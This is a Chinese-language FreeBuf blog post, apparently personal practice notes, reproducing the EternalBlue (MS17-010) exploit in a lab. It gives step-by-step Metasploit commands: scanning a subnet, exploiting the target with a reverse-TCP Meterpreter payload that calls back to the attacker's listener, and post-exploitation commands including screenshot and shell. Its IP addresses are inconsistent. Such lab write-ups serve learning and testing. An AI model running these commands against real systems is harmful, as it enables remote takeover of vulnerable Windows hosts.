freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次永恒之蓝漏洞复现
2023-09-18 10:58:06

查看kali的IP地址:ifconfig

1695005157_6507b9e546e3ca4c1cbdf.png!small

查看靶机IP地址

1695005171_6507b9f3de0df98d4875a.png!small

测试两台主机的连通性:ping ip

1695005189_6507ba055c41c6c0ff9c4.png!small

查看kali数据库是否开启:service postgresql status

1695005196_6507ba0c83b7b1206aada.png!small

Active:inactive(dead)表示数据库是关闭的

打开kali数据库:service postgresql start

1695005205_6507ba157c37a26c23e2b.png!small

Active:active(exited)表示数据库是开启的

进行msfdb数据库初始化:msfdb init

启动msf:msfconsole

1695005232_6507ba306cc32c370bace.png!small

查看数据库连接情况:在msf命令提示符下:db_status

1695005243_6507ba3bf31054d455476.png!small

postgresql connected to msf 说明已经成功连接到了msf

搜索ms17_010:search ms17_010

1695005269_6507ba55cff74da744238.png!small

扫描命令:use auxiliary/scanner/smb/smb_ms17_010

攻击命令(后面使用):use exploit/windows/smb/ms17_010_eternalblue

此时如果不知道应该使用什么命令可以输入options获得帮助,其中关注两个命令:RHOSTS和THREADS

RHOSTS是要扫描的主机(主机段),THREADS是线段,默认是1,开始使用线程加快扫描

1695005281_6507ba61443da48b11316.png!small

设置扫描的主机或主机端(由于靶机IP地址是192.168.0.0,因此设置扫描主机段位192.168.0.0/24)

set rhosts 192.168.0.0/24,然后设置扫描线程为20;最后输入run执行扫描。同时可以打开wireshark进行抓包,监听eth0。扫描出来存在ms17_010漏洞的主机,也恰好是靶机。通过跟踪TCP流,得到了靶机的基本信息:操作系统、IP地址、协议。

1695005383_6507bac752d17f9e24b57.png!small

1695005393_6507bad1a1ee4efe61eb3.png!small

1695005398_6507bad6428384ea8ef8d.png!small

1695005416_6507bae802c5ce0437bec.png!small

进行攻击:use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标(靶机):set rhost 192.168.0.0

设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

设置监听主机(kali):set lhost 192.168.0.1

利用exploit进行攻击:exploit

1695005428_6507baf456cc84ee25ac3.png!small

1695005435_6507bafb6c50577409d65.png!small

可以看到监听(kali)IP(192.168.148.137)及端口(4444),被攻击主机(192.168.148.113)及端口(49159)之间建立了连接

显示远程主机系统信息:sysinfo

1695005497_6507bb391efc7529c0606.png!small

查看用户身份:getuid

1695005546_6507bb6a38b48a401a325.png!small

对当前远程主机屏幕进行截图:screenshot

1695005512_6507bb48e114cbdd55b5a.png!small

获得shell控制台:shell

1695005523_6507bb53bdae74f564179.png!small

个人的练习笔记-小菜不足的地方望指导

本文作者:, 转载请注明来自FreeBuf.COM

# 漏洞 # 渗透测试 # 网络安全 # 网络安全技术
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者